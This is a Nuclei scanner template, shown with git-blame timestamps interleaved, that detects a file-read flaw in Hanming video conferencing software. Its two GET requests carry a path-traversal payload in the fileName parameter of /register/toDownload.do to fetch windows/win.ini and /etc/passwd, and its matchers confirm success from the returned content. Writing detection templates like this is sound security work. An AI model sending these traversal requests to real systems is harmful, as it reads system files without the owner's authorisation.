2022-04-09 19:42:47 +00:00
|
|
|
id: hanming-lfr
|
2022-04-08 08:10:46 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Hanming Video Conferencing File Read
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA
|
2022-04-09 19:42:47 +00:00
|
|
|
tags: lfr,hanming,lfi
|
2022-04-08 08:10:46 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
|
|
|
|
- "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
|
2022-04-09 19:42:47 +00:00
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
2022-04-08 08:10:46 +00:00
|
|
|
matchers:
|
2022-04-09 19:42:47 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "bit app support"
|
|
|
|
- "fonts"
|
|
|
|
- "extensions"
|
|
|
|
condition: and
|
|
|
|
|
2022-04-08 08:10:46 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|